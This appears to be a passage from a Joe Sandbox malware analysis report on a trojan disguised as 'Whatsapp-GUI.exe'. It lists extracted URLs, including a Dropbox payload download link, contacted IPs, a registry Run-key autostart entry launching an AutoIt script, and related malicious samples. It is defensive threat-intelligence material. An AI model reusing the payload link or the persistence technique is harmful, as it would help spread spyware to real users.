https://instructorledlearning.dropboxbusiness.com/	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.autoitscript.com/autoit3/	Whatsapp-GUI.exe, 00000000.00000002.3100193860.000000000344C000.00000004.00000800.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2227403082.00000000047B3000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2230168514.00000000046D6000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2227976170.00000000047B1000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe.0.dr, Autoit3.exe.3.dr	false		high
https://www.dropbox.com/page_success/	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://uceaa44e3ed7199ee43fadd414c8.dl.dropboxusercontent.comd	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033CB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.dropbox.com/	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropbox.com/pithos/	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sales.dropboxbusiness.com/	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://photos.dropbox.com/	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://a.sprig.com/	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.docsend.com/	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www-env.dropbox-dns.comd	Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.dropbox.com/encrypted_folder_download/service_worker.js	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://navi.dropbox.jp/	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropbox.com/static/api/	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://edge-block-www-env.dropbox-dns.com	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033CB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropboxstatic.com/static/	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://officeapps-df.live.com	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.login.yahoo.com/	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Whatsapp-GUI.exe, 00000000.00000002.3100193860.000000000335E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://login.yahoo.com/	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docsend.com/	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropbox.com/playlist/	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://onedrive.live.com/picker	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.autoitscript.com/autoit3/J	UpdaterService.exe, 00000003.00000003.2227403082.00000000047B3000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000002.3939301227.0000000000399000.00000002.00000001.01000000.0000000C.sdmp, UpdaterService.exe, 00000003.00000003.2230168514.00000000046D6000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2227976170.00000000047B1000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmp, Autoit3.exe, 00000009.00000000.2439797326.0000000000D09000.00000002.00000001.01000000.0000000E.sdmp, Autoit3.exe.0.dr, Autoit3.exe.3.dr	false		high
https://showcase.dropbox.com/	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropbox.com/static/serviceworker/	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropbox.com	Whatsapp-GUI.exe, 00000000.00000002.3100193860.000000000335E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://edge-block-www-env.dropbox-dns.comd	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033CB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.dropbox.com/scl/fi/puclhgu65e9r37o3vcp9m/yutighh.zip?rlkey=csgz30n1xx1twdk9ue4m4p16s&st=	Whatsapp-GUI.exe	false		high
https://uceaa44e3ed7199ee43fadd414c8.dl.dropboxusercontent.com/cd/0/get/CgQAiHznR0-yJXtQgIcAQDe00JEJ	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.dropbox.comd	Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://uceaa44e3ed7199ee43fadd414c8.dl.dropboxusercontent.com	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.dropbox.com/v/s/playlist/	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www-env.dropbox-dns.com	Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.sandbox.google.com/document/fsip/	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.sandbox.google.com/spreadsheets/fsip/	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/document/fsip/	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://help.dropbox.com/	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ipinfo.io/ip	UpdaterService.exe, UpdaterService.exe, 00000003.00000002.3941184211.0000000003EC1000.00000040.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000002.3940858660.0000000003D04000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000002.3942078609.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2230084824.0000000004A40000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2229666287.0000000004DA8000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000002.3941115350.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, Autoit3.exe, 00000008.00000002.2391311533.0000000004534000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.2391730734.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000009.00000002.2473661305.0000000004400000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000009.00000002.2473412421.0000000004344000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000009.00000002.2473753332.0000000004501000.00000040.00001000.00020000.00000000.sdmp	false		high
https://docs.google.com/presentation/fsip/	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://canny.io/sdk.js	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://selfguidedlearning.dropboxbusiness.com/	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/recaptcha/	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ipinfo.io/ipU	UpdaterService.exe, 00000003.00000002.3941184211.0000000003EC1000.00000040.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000002.3940858660.0000000003D04000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000002.3942078609.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2230084824.0000000004A40000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2229666287.0000000004DA8000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000002.3941115350.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.2391311533.0000000004534000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.2391730734.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000009.00000002.2473661305.0000000004400000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000009.00000002.2473412421.0000000004344000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000009.00000002.2473753332.0000000004501000.00000040.00001000.00020000.00000000.sdmp	false		high
https://docs.sandbox.google.com/presentation/fsip/	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mail.google.com/mail/u/0/#inbox	Autoit3.exe, 00000009.00000002.2473753332.0000000004501000.00000040.00001000.00020000.00000000.sdmp	false		high
https://dl-web.dropbox.com/	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://app.hellofax.com/	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cfl.dropboxstatic.com/static/	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.paypal.com/sdk/js	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/spreadsheets/fsip/	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
162.125.65.18	www-env.dropbox-dns.com	United States	19679	DROPBOXUS	false
154.216.16.83	unknown	Seychelles	135357	SKHT-ASShenzhenKatherineHengTechnologyInformationCo	false
162.125.69.15	edge-block-www-env.dropbox-dns.com	United States	19679	DROPBOXUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1575235
Start date and time:	2024-12-14 21:51:56 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 14s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Whatsapp-GUI.exe
Detection:	MAL
Classification:	mal57.troj.spyw.evad.winEXE@10/12@2/3
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 99% Number of executed functions: 142 Number of non-executed functions: 297
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.218.208.109, 13.107.246.63, 52.149.20.212
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target UpdaterService.exe, PID 2876 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Whatsapp-GUI.exe

Simulations

Behavior and APIs

Time	Type	Description
21:53:11	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run cefccga "C:\ProgramData\addbage\Autoit3.exe" C:\ProgramData\addbage\ffdghbb.a3x
21:53:19	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run cefccga "C:\ProgramData\addbage\Autoit3.exe" C:\ProgramData\addbage\ffdghbb.a3x

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
162.125.65.18	3_Garmin_Campaign Information for Partners(12-11).docx.lnk.download.lnk	Get hash	malicious	Abobus Obfuscator, Braodo	Browse
	[EXTERNAL] Doug Lenon shared _GARY LEIMER INC SIGNED CONTRACT & PAY APPLICATIONS.paper_ with you.eml	Get hash	malicious	Unknown	Browse
	phish_alert_sp2_2.0.0.0.eml	Get hash	malicious	Unknown	Browse
	qxjDerXRGR.lnk	Get hash	malicious	RHADAMANTHYS	Browse
	taCCGTk8n1.lnk	Get hash	malicious	RHADAMANTHYS	Browse
	Updates.bat	Get hash	malicious	Abobus Obfuscator	Browse
	ljshdfglksdfNEW.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse
	QD40FIJ8QK.lnk	Get hash	malicious	Unknown	Browse
	https://www.dropbox.com/l/AADbLOqftgPkdsTWgBgFyNpmu-iGeYJGM4I	Get hash	malicious	Unknown	Browse
	https://t.ly/HThl-Link1-0312	Get hash	malicious	Unknown	Browse
162.125.69.15	2024_12_12_Aster_Oak_Babywear_Advertising_Project_Shopify.pdf.lnk.download.lnk	Get hash	malicious	Unknown	Browse
	751ietQPnX.lnk	Get hash	malicious	RHADAMANTHYS	Browse
	l92fYljXWF.lnk	Get hash	malicious	RHADAMANTHYS	Browse
	qxjDerXRGR.lnk	Get hash	malicious	RHADAMANTHYS	Browse
	taCCGTk8n1.lnk	Get hash	malicious	RHADAMANTHYS	Browse
	Richiesta di Indagine sulla Violazione del Copyright lnk.lnk	Get hash	malicious	Unknown	Browse
	interior-design-villa-a23.lnk	Get hash	malicious	MalLnk	Browse
	zW72x5d91l.bat	Get hash	malicious	Unknown	Browse
	https://www.dropbox.com/l/AADbLOqftgPkdsTWgBgFyNpmu-iGeYJGM4I	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
edge-block-www-env.dropbox-dns.com	2024_12_12_Aster_Oak_Babywear_Advertising_Project_Shopify.pdf.lnk.download.lnk	Get hash	malicious	Unknown	Browse	162.125.69.15
	3_Garmin_Campaign Information for Partners(12-11).docx.lnk.download.lnk	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.15
	751ietQPnX.lnk	Get hash	malicious	RHADAMANTHYS	Browse	162.125.69.15
	l92fYljXWF.lnk	Get hash	malicious	RHADAMANTHYS	Browse	162.125.69.15
	qxjDerXRGR.lnk	Get hash	malicious	RHADAMANTHYS	Browse	162.125.69.15
	taCCGTk8n1.lnk	Get hash	malicious	RHADAMANTHYS	Browse	162.125.69.15
	Richiesta di Indagine sulla Violazione del Copyright lnk.lnk	Get hash	malicious	Unknown	Browse	162.125.69.15
	interior-design-villa-a23.lnk	Get hash	malicious	MalLnk	Browse	162.125.69.15
	Updates.bat	Get hash	malicious	Abobus Obfuscator	Browse	162.125.69.15
www-env.dropbox-dns.com	2024_12_12_Aster_Oak_Babywear_Advertising_Project_Shopify.pdf.lnk.download.lnk	Get hash	malicious	Unknown	Browse	162.125.69.15
	https://dashboard.sizle.io/p/f7c9cdf19	Get hash	malicious	HTMLPhisher	Browse	162.125.69.18
	3_Garmin_Campaign Information for Partners(12-11).docx.lnk.download.lnk	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.65.18
	garsukhjdf11.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.18
	1_Garmin_Campaign Information for Partners(12-10).docx.lnk.download.lnk	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.18
	nbavdfasfGarminde.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.18
	[EXTERNAL] Doug Lenon shared _GARY LEIMER INC SIGNED CONTRACT & PAY APPLICATIONS.paper_ with you.eml	Get hash	malicious	Unknown	Browse	162.125.65.18
	phish_alert_sp2_2.0.0.0.eml	Get hash	malicious	Unknown	Browse	162.125.65.18
	751ietQPnX.lnk	Get hash	malicious	RHADAMANTHYS	Browse	162.125.69.18

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
DROPBOXUS	2024_12_12_Aster_Oak_Babywear_Advertising_Project_Shopify.pdf.lnk.download.lnk	Get hash	malicious	Unknown	Browse	162.125.69.15
	https://dashboard.sizle.io/p/f7c9cdf19	Get hash	malicious	HTMLPhisher	Browse	162.125.69.18
	3_Garmin_Campaign Information for Partners(12-11).docx.lnk.download.lnk	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.65.18
	garsukhjdf11.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.18
	1_Garmin_Campaign Information for Partners(12-10).docx.lnk.download.lnk	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.18
	nbavdfasfGarminde.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.18
	https://feji.us/m266he	Get hash	malicious	Unknown	Browse	162.125.69.18
	[EXTERNAL] Doug Lenon shared _GARY LEIMER INC SIGNED CONTRACT & PAY APPLICATIONS.paper_ with you.eml	Get hash	malicious	Unknown	Browse	162.125.1.20
	phish_alert_sp2_2.0.0.0.eml	Get hash	malicious	Unknown	Browse	162.125.40.3
SKHT-ASShenzhenKatherineHengTechnologyInformationCo	RMX.exe	Get hash	malicious	Remcos	Browse	154.216.18.132
	byte.m68k.elf	Get hash	malicious	Okiru	Browse	154.216.19.200
	byte.arm7.elf	Get hash	malicious	Mirai, Okiru	Browse	154.216.19.200
	byte.arm.elf	Get hash	malicious	Okiru	Browse	154.216.19.200
	0x86d.arm7.elf	Get hash	malicious	Mirai, Okiru	Browse	154.216.19.211
	0x86d.sh4.elf	Get hash	malicious	Mirai, Okiru	Browse	154.216.19.211
	0x86d.mips.elf	Get hash	malicious	Mirai, Okiru	Browse	154.216.19.211
	zmap.x86.elf	Get hash	malicious	Okiru	Browse	154.216.17.227
	zmap.sh4.elf	Get hash	malicious	Mirai, Okiru	Browse	154.216.17.227
DROPBOXUS	2024_12_12_Aster_Oak_Babywear_Advertising_Project_Shopify.pdf.lnk.download.lnk	Get hash	malicious	Unknown	Browse	162.125.69.15
	https://dashboard.sizle.io/p/f7c9cdf19	Get hash	malicious	HTMLPhisher	Browse	162.125.69.18
	3_Garmin_Campaign Information for Partners(12-11).docx.lnk.download.lnk	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.65.18
	garsukhjdf11.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.18
	1_Garmin_Campaign Information for Partners(12-10).docx.lnk.download.lnk	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.18
	nbavdfasfGarminde.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.18
	https://feji.us/m266he	Get hash	malicious	Unknown	Browse	162.125.69.18
